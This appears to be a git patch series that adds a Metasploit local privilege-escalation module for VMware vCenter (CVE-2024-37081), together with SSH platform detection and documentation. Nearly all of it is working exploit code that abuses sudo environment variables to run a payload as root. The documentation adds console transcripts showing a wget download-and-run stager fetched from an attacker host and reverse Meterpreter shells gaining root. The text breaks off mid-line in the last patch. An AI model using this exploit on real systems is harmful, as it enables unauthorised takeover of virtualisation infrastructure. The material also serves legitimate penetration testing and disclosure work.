From c8084e4504b2a5d7375373fd2ebb5698509bf022 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 19 Aug 2024 20:02:05 -0400 Subject: [PATCH 1/7] Create vcenter_sudo_lpe.rb --- .../exploits/linux/local/vcenter_sudo_lpe.rb | 148 ++++++++++++++++++ 1 file changed, 148 insertions(+) create mode 100644 modules/exploits/linux/local/vcenter_sudo_lpe.rb diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb new file mode 100644 index 000000000000..dd6a4515c891 --- /dev/null +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -0,0 +1,148 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = GreatRanking + + include Msf::Post::Linux::Priv + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::Vcenter + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'vCenter Sudo Privilege Escalation', + 'Description' => %q{ + VMware vCenter Server < 7.0.3 update R and < 8.0.2 update D + contains multiple local privilege escalation vulnerabilities + due to misconfiguration of sudo. An authenticated local user + with non-administrative privileges may exploit these issues + to elevate privileges to root on vCenter Server Appliance. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'h00die', # msf module + 'Matei "Mal" Badanoiu', # discovery + ], + 'Platform' => [ 'linux' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [ + [ 'Auto', {} ], + ], + 'Privileged' => true, + 'References' => [ + [ 'URL', 'https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24453'], + [ 'URL', 'https://github.com/mbadanoiu/CVE-2024-37081/blob/main/VMware%20vCenter%20-%20CVE-2024-37081.pdf'], + [ 'CVE', '2024-37081'] + ], + 'DisclosureDate' => '2024-06-18', + 'DefaultTarget' => 0, + # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html + 'Notes' => { + 'Stability' => [], + 'Reliability' => [], + 'SideEffects' => [] + } + ) + ) + # force exploit is used to bypass the check command results + register_advanced_options [ + OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) + ] + end + + # Simplify pulling the writable directory variable + def base_dir + datastore['WritableDir'].to_s + end + + def check + vbuild = get_vcenter_build # VMware VirtualCenter 7.0.3 build-19480866 + # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS + # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild + vbuild_version = Rex::Version.new("#{Regexp.last_match(0)}.#{Regexp.last_match(1)}") + + return CheckCode::Safe("Version not vulnerable: #{vbuild}") + unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d + (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) || # 7.0 u3r + + vprint_good("Exploitable version detected: #{vbuild_version}") + + user = cmd_exec('whoami').chomp + groups = cmd_exec('groups').split(' ').chomp + if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user || + ['operator', 'admin'] & group + vprint_good("User is vulnerable") + else + return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") + end + + CheckCode::Appears("System seems exploitable") + end + + def exploit_operator_group + # for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we + # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution + vprint_status("Utilizing PYTHONPATH exploitation method for operator group.") + vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py' + + return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe + + # Upload payload executable + payload_path = "#{base_dir}/spwd.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' + output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit_pod_user + # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we + # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution + vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") + mkdir("#{base_dir}/appliance") + payload_path = "#{base_dir}/__init__.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' + output = cmd_exec "echo 'VMWARE_PYTHON_PATH=#{base_dir} sudo install-parameter & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit_admin_group + # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN + # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution + vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.") + mkdir("#{base_dir}/appliance") + payload_path = "#{base_dir}/__init__.py" + upload_and_chmodx payload_path, generate_payload_exe + register_files_for_cleanup(payload_path) + timeout = 30 + print_status 'Launching exploit...' + output = cmd_exec "echo 'VMWARE_PYTHON_BIN=#{payload_path} sudo /bin/dcli & exit' | #{executable_path}", nil, timeout + output.each_line { |line| vprint_status line.chomp } + end + + def exploit + user = cmd_exec('whoami').chomp + groups = cmd_exec('groups').split(' ').chomp + if user == 'pod' + exploit_pod_user + elsif group.contains? 'operator' + exploit_operator_group + elsif group.contains? 'admin' + exploit_admin_group + end + end +end From 5d2bc4aa3c785b263164147881767c7532b0128e Mon Sep 17 00:00:00 2001 From: h00die Date: Sun, 3 Nov 2024 14:47:40 -0500 Subject: [PATCH 2/7] add vcenter server appliance to ssh platform --- lib/metasploit/framework/ssh/platform.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index 6d016f27ee9c..1a4001c88eec 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb @@ -73,6 +73,14 @@ def self.get_platform_info(ssh_socket, timeout: 10) # esxi 6.7 elsif info =~ /sh: id: not found/ info = ssh_socket.exec!("vmware -v\n").to_s + # vcenter 6.7 (photon) + elsif info =~ /Unknown command: `id'/ + info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s + /Product:\s+(?.+)$/ =~ info + /Version:\s+(?[\d\.]+)$/ =~ info + if version && product + info = "#{product.strip} #{version.strip}" + end else info << ssh_socket.exec!("help\n?\n\n\n").to_s end @@ -113,6 +121,8 @@ def self.get_platform_from_info(info) 'mikrotik' when /Arista/i 'arista' + when /VMware vCenter Server Appliance/i + 'vcenter' else 'unknown' end From 773355f0e8f8db0ade851334717325683bbc439f Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 4 Nov 2024 16:26:08 -0500 Subject: [PATCH 3/7] making bcenter lpe progress --- lib/metasploit/framework/ssh/platform.rb | 3 +++ .../exploits/linux/local/vcenter_sudo_lpe.rb | 20 +++++++++---------- 2 files changed, 12 insertions(+), 11 deletions(-) diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index 1a4001c88eec..f0c38ca4d4ff 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb @@ -75,6 +75,9 @@ def self.get_platform_info(ssh_socket, timeout: 10) info = ssh_socket.exec!("vmware -v\n").to_s # vcenter 6.7 (photon) elsif info =~ /Unknown command: `id'/ + # VMware VirtualCenter 6.7.0 build-19299595 + # eventually we'll want to try to shell in via 'shell'. On failure you see: "User 'user_operator' is not authorized to run this command" + # on succeess: "Shell access is granted to " info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s /Product:\s+(?.+)$/ =~ info /Version:\s+(?[\d\.]+)$/ =~ info diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index dd6a4515c891..46279eef7ea2 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Local include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper - include Msf::Post::Vcenter + include Msf::Post::Vcenter::Vcenter prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) @@ -68,18 +68,16 @@ def check # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild - vbuild_version = Rex::Version.new("#{Regexp.last_match(0)}.#{Regexp.last_match(1)}") + vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") - return CheckCode::Safe("Version not vulnerable: #{vbuild}") - unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d - (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) || # 7.0 u3r + return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d + (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r vprint_good("Exploitable version detected: #{vbuild_version}") - user = cmd_exec('whoami').chomp - groups = cmd_exec('groups').split(' ').chomp - if ['infraprofile', 'vpxd', 'sts', 'pod'].contains? user || - ['operator', 'admin'] & group + @user = cmd_exec('whoami').chomp + @groups = cmd_exec('groups').split(' ').chomp + if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? vprint_good("User is vulnerable") else return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") @@ -135,8 +133,8 @@ def exploit_admin_group end def exploit - user = cmd_exec('whoami').chomp - groups = cmd_exec('groups').split(' ').chomp + @user = cmd_exec('whoami').chomp if @user.nil? + @groups = cmd_exec('groups').split(' ').chomp if @groups.nil? if user == 'pod' exploit_pod_user elsif group.contains? 'operator' From f38661d6c3739230591fddfa0de263a87244ec94 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 18 Nov 2024 07:30:21 -0500 Subject: [PATCH 4/7] pod user working --- .../exploit/linux/local/vcenter_sudo_lpe.md | 133 ++++++++++++++++++ lib/metasploit/framework/ssh/platform.rb | 6 +- .../exploits/linux/local/vcenter_sudo_lpe.rb | 26 ++-- 3 files changed, 153 insertions(+), 12 deletions(-) create mode 100644 documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md new file mode 100644 index 000000000000..0ab8bcf61220 --- /dev/null +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md @@ -0,0 +1,133 @@ +## Vulnerable Application + +Instructions to get the vulnerable application. If applicable, include links to the vulnerable install +files, as well as instructions on installing/configuring the environment if it is different than a +standard install. Much of this will come from the PR, and can be copy/pasted. + +## Verification Steps +Example steps in this format (is also in the PR): + +1. Install the application +1. Start msfconsole +1. Do: `use [module path]` +1. Do: `run` +1. You should get a shell. + +## Options +List each option and how to use it. + +### Option Name + +Talk about what it does, and how to use it appropriately. If the default value is likely to change, include the default value here. + +## Scenarios +Specific demo of using the module that might be useful in a real world scenario. + +### VMware vCenter Server Appliance 8.0.0.10000 (VMware-VCSA-all-8.0.0-20519528.iso) + +#### `pod` user + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/wS8RErnHVLh +[*] Server started. +[*] Run the following command on the target machine: +wget -qO 5Y0wnQU5 --no-check-certificate http://2.2.2.2:8181/wS8RErnHVLh; chmod +x 5Y0wnQU5; ./5Y0wnQU5& disown +``` + +Setup, SSH in, start a shell, allow `pod` login access, then change user and start our payload. + +``` +PS C:\Users\h00die> ssh root@1.1.1.1 + +VMware vCenter Server Appliance 8.0.0.10000 + +(root@1.1.1.1) Password: +Connected to service + + * List APIs: "help api list" + * List Plugins: "help pi list" + * Launch BASH: "shell" + +Command> api com.vmware.appliance.version1.system.version.get +Version: + Version: 8.0.0.10000 + Product: VMware vCenter Server + Build: 20519528 + Type: '' + Summary: VMware vCenter Server 8.0 + Releasedate: October 11, 2022 + Installtime: '' + +Command> shell +Shell access is granted to root +root@localhost [ ~ ]# usermod -s /bin/bash pod +/usr/sbin/usermod.bk -s /bin/bash pod +root@localhost [ ~ ]# su pod +pod@localhost [ /root ]$ cd /tmp +pod@localhost [ /tmp ]$ wget -qO smswhnVK --no-check-certificate http://2.2.2.2:8181/xLaIAPnwiuPr9; chmod +x smswhnVK; ./smswhnVK& disown +[1] 22325 +``` + +Priv Esc + +``` +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: pod +(Meterpreter 1)(/tmp) > background +[*] Backgrounding session 1... +[msf](Jobs:1 Agents:1) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set lport 9879 +lport => 9879 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run + +[*] Started reverse TCP handler on 2.2.2.2:9879 +[!] AutoCheck is disabled, proceeding with exploitation +[*] Utilizing VMWARE_PYTHON_PATH exploitation method for pod user. +[*] Creating directory /tmp/appliance +[*] /tmp/appliance created +[*] Writing '/tmp/appliance/9OP6wIQJl9' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/appliance/9OP6wIQJl9 +[+] Deleted /tmp/appliance/__init__.py +[+] Deleted /tmp/appliance +[*] Meterpreter session 2 opened (2.2.2.2:9879 -> 1.1.1.1:34894) at 2024-11-18 07:24:13 -0500 + +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: pod +``` diff --git a/lib/metasploit/framework/ssh/platform.rb b/lib/metasploit/framework/ssh/platform.rb index f0c38ca4d4ff..8d541ef7b8f6 100644 --- a/lib/metasploit/framework/ssh/platform.rb +++ b/lib/metasploit/framework/ssh/platform.rb @@ -74,8 +74,9 @@ def self.get_platform_info(ssh_socket, timeout: 10) elsif info =~ /sh: id: not found/ info = ssh_socket.exec!("vmware -v\n").to_s # vcenter 6.7 (photon) - elsif info =~ /Unknown command: `id'/ + # VMware vCenter Server 8.0.0.10000 # VMware VirtualCenter 6.7.0 build-19299595 + elsif info =~ /Unknown command: `id'/ # eventually we'll want to try to shell in via 'shell'. On failure you see: "User 'user_operator' is not authorized to run this command" # on succeess: "Shell access is granted to " info = ssh_socket.exec!("api com.vmware.appliance.version1.system.version.get\n\n").to_s @@ -90,7 +91,6 @@ def self.get_platform_info(ssh_socket, timeout: 10) end rescue Timeout::Error end - info end @@ -124,7 +124,7 @@ def self.get_platform_from_info(info) 'mikrotik' when /Arista/i 'arista' - when /VMware vCenter Server Appliance/i + when /VMware vCenter Server/i 'vcenter' else 'unknown' diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 46279eef7ea2..0e27828d8595 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -64,10 +64,12 @@ def base_dir end def check - vbuild = get_vcenter_build # VMware VirtualCenter 7.0.3 build-19480866 + vbuild = get_vcenter_build + # VMware VirtualCenter 7.0.3 build-19480866 + # VMware vCenter Server Appliance 6.5.0.0 Build 16197320 # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead - return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build-(\d+)/ =~ vbuild + return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d @@ -76,7 +78,7 @@ def check vprint_good("Exploitable version detected: #{vbuild_version}") @user = cmd_exec('whoami').chomp - @groups = cmd_exec('groups').split(' ').chomp + @groups = cmd_exec('groups').chomp.split(' ') if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? vprint_good("User is vulnerable") else @@ -109,12 +111,18 @@ def exploit_pod_user # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") mkdir("#{base_dir}/appliance") - payload_path = "#{base_dir}/__init__.py" + + payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + payload_stub = "#{base_dir}/appliance/__init__.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'VMWARE_PYTHON_PATH=#{base_dir} sudo install-parameter & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo VMWARE_PYTHON_PATH=#{base_dir} install-parameter", nil, timeout output.each_line { |line| vprint_status line.chomp } end @@ -134,12 +142,12 @@ def exploit_admin_group def exploit @user = cmd_exec('whoami').chomp if @user.nil? - @groups = cmd_exec('groups').split(' ').chomp if @groups.nil? - if user == 'pod' + @groups = cmd_exec('groups').chomp.split(' ') if @groups.nil? + if @user == 'pod' exploit_pod_user - elsif group.contains? 'operator' + elsif @group.contains? 'operator' exploit_operator_group - elsif group.contains? 'admin' + elsif @group.contains? 'admin' exploit_admin_group end end From 6bd049e3468c91aa3ef7c244084b2b18b1cd9fcd Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 18 Nov 2024 20:09:13 -0500 Subject: [PATCH 5/7] operator working --- .../exploit/linux/local/vcenter_sudo_lpe.md | 136 ++++++++++++++++++ .../exploits/linux/local/vcenter_sudo_lpe.rb | 45 ++++-- 2 files changed, 167 insertions(+), 14 deletions(-) diff --git a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md index 0ab8bcf61220..f2b660ab7023 100644 --- a/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md +++ b/documentation/modules/exploit/linux/local/vcenter_sudo_lpe.md @@ -131,3 +131,139 @@ Server username: root (Meterpreter 1)(/tmp) > getuid Server username: pod ``` + +#### Operator Group + +If the user `mal` exists, use that. If not, follow the bellow instructions + +Make a user in the operator group: + +``` +sudo useradd -m -s /bin/bash operator1 +sudo usermod -aG users operator1 +sudo usermod -aG operator operator1 +``` + +This may be enough, but on my install which didn't complete I had to add the sudo entry manually. + +``` +visudo +``` + +Add the following at the end: + +``` +User_Alias PYTHON_USERS = operator1 +Defaults:PYTHON_USERS env_keep += "PYTHONPATH" +``` + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/eEgibKL2K +[*] Server started. +[*] Run the following command on the target machine: +wget -qO JSlY5cPV --no-check-certificate http://2.2.2.2:8181/eEgibKL2K; chmod +x JSlY5cPV; ./JSlY5cPV& disown +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 +``` + +Priv Esc + +``` +[msf](Jobs:1 Agents:0) exploit(multi/script/web_delivery) > use exploit/linux/local/vcenter_sudo_lpe +[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set lport 9870 +lport => 9870 +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set verbose true +verbose => true +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set autocheck false +autocheck => false +[msf](Jobs:1 Agents:0) exploit(linux/local/vcenter_sudo_lpe) > set session 1 +session => 1 +[msf](Jobs:1 Agents:1) exploit(linux/local/vcenter_sudo_lpe) > run + +[*] Started reverse TCP handler on 2.2.2.2:9870 +[!] AutoCheck is disabled, proceeding with exploitation +[*] Utilizing PYTHONPATH exploitation method for operator group. +[*] Writing '/tmp/Ma5gGdnt' (250 bytes) ... +[*] Launching exploit... +[*] Transmitting intermediate stager...(126 bytes) +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[+] Deleted /tmp/Ma5gGdnt +[+] Deleted /tmp/spwd.py +[*] Meterpreter session 2 opened (2.2.2.2:9870 -> 1.1.1.1:40550) at 2024-11-18 16:27:28 -0500 + + +(Meterpreter 2)(/tmp) > +(Meterpreter 2)(/tmp) > getuid +Server username: root +(Meterpreter 2)(/tmp) > background +[*] Backgrounding session 2... +s[msf](Jobs:1 Agents:2) exploit(linux/local/vcenter_sudo_lpe) > sessions -i 1 +[*] Starting interaction with 1... + +(Meterpreter 1)(/tmp) > getuid +Server username: operator1 +``` + +#### Admin Group + +If the user `admin` exists, use that. If not, follow the bellow instructions + +Make a user in the operator group: + +``` +sudo useradd -m -s /bin/bash admin +sudo usermod -aG admin admin +sudo usermod -aG users admin +``` + +Start our first handler + +``` +[msf](Jobs:0 Agents:0) > use exploit/multi/script/web_delivery +[*] Using configured payload python/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set lhost 2.2.2.2 +lhost => 2.2.2.2 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set srvport 8181 +srvport => 8181 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set target 7 +target => 7 +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > set payload payload/linux/x64/meterpreter/reverse_tcp +payload => linux/x64/meterpreter/reverse_tcp +[msf](Jobs:0 Agents:0) exploit(multi/script/web_delivery) > run +[*] Exploit running as background job 0. +[*] Exploit completed, but no session was created. +[*] Started reverse TCP handler on 2.2.2.2:4444 +[*] Using URL: http://2.2.2.2:8181/Hul7qG +[*] Server started. +[*] Run the following command on the target machine: +wget -qO IsMq60f5 --no-check-certificate http://2.2.2.2:8181/Hul7qG; chmod +x IsMq60f5; ./IsMq60f5& disown +[*] Sending stage (3045380 bytes) to 1.1.1.1 +[*] Meterpreter session 1 opened (2.2.2.2:4444 -> 1.1.1.1:56166) at 2024-11-18 16:27:17 -0500 +``` + +Priv Esc + +``` +``` + + +XXX to be completed \ No newline at end of file diff --git a/modules/exploits/linux/local/vcenter_sudo_lpe.rb b/modules/exploits/linux/local/vcenter_sudo_lpe.rb index 0e27828d8595..256557673962 100644 --- a/modules/exploits/linux/local/vcenter_sudo_lpe.rb +++ b/modules/exploits/linux/local/vcenter_sudo_lpe.rb @@ -70,52 +70,61 @@ def check # we want to try to make this build number Rex::Version friendly. https://rubular.com/r/BNLDjy0C862cdS # technically we only care about major release 7 and 8, however we'll try to future proof w/ \d instead return CheckCode::Safe("Unable to determine vcenter build from output: #{vbuild}") unless /(\d\.\d\.\d) build[- ](\d+)/i =~ vbuild + vbuild_version = Rex::Version.new("#{Regexp.last_match(1)}.#{Regexp.last_match(2)}") return CheckCode::Safe("Version not vulnerable: #{vbuild}") unless (vbuild_version > Rex::Version.new('8.0.0') && vbuild_version < Rex::Version.new('8.0.2.23929136')) || # 8.0 u2d - (vbuild_version > Rex::Version.new('7.0.0')&& vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r + (vbuild_version > Rex::Version.new('7.0.0') && vbuild_version < Rex::Version.new('7.0.3.24026615')) # 7.0 u3r vprint_good("Exploitable version detected: #{vbuild_version}") @user = cmd_exec('whoami').chomp @groups = cmd_exec('groups').chomp.split(' ') if ['infraprofile', 'vpxd', 'sts', 'pod'].contains?(user) || (['operator', 'admin'] & group).any? - vprint_good("User is vulnerable") + vprint_good('User is vulnerable') else return CheckCode::Safe("User not vulnerable or not in correct group. (#{user}:#{groups})") end - CheckCode::Appears("System seems exploitable") + CheckCode::Appears('System seems exploitable') end def exploit_operator_group # for this exploit we abuse get_user_password_status.py as it does a 'import spwd', so if we # modify the PYTHONPATH and set our payload to spwd.py, we'll get arbitrary execution - vprint_status("Utilizing PYTHONPATH exploitation method for operator group.") + vprint_status('Utilizing PYTHONPATH exploitation method for operator group.') vuln_exe = '/usr/lib/applmgmt/support/scripts/get_user_password_status.py' - return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file?vuln_exe + return Failure::NotFound, "Vulnerable script #{vuln_exe} not found" unless file? vuln_exe # Upload payload executable - payload_path = "#{base_dir}/spwd.py" + payload_path = "#{base_dir}/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + + # Upload payload stub + payload_stub = "#{base_dir}/spwd.py" + write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") + register_files_for_cleanup(payload_stub) + timeout = 30 print_status 'Launching exploit...' - output = cmd_exec "echo 'PYTHONPATH=#{base_dir} sudo #{vuln_exe} & exit' | #{executable_path}", nil, timeout + output = cmd_exec "sudo PYTHONPATH=#{base_dir} #{vuln_exe}", nil, timeout output.each_line { |line| vprint_status line.chomp } end def exploit_pod_user # for this exploit we abuse install-parametery as it does a 'from appliance...', so if we # modify the VMWARE_PYTHON_PATH and set our payload to __init__.py, we'll get arbitrary execution - vprint_status("Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.") + vprint_status('Utilizing VMWARE_PYTHON_PATH exploitation method for pod user.') mkdir("#{base_dir}/appliance") - + + # Upload payload executable payload_path = "#{base_dir}/appliance/#{rand_text_alphanumeric(6..10)}" upload_and_chmodx payload_path, generate_payload_exe register_files_for_cleanup(payload_path) + # Upload payload stub payload_stub = "#{base_dir}/appliance/__init__.py" write_file(payload_stub, "import os\nos.system('#{payload_path}')\nquit()") register_files_for_cleanup(payload_stub) @@ -129,14 +138,22 @@ def exploit_pod_user def exploit_admin_group # for this exploit we abuse /bin/dcli, a bash script, as it executes $VMWARE_PYTHON_BIN # so we modify the VMWARE_PYTHON_BIN, and we'll get arbitrary execution - vprint_status("Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.") + vprint_status('Utilizing VMWARE_PYTHON_BIN exploitation method for admin group.') mkdir("#{base_dir}/appliance") - payload_path = 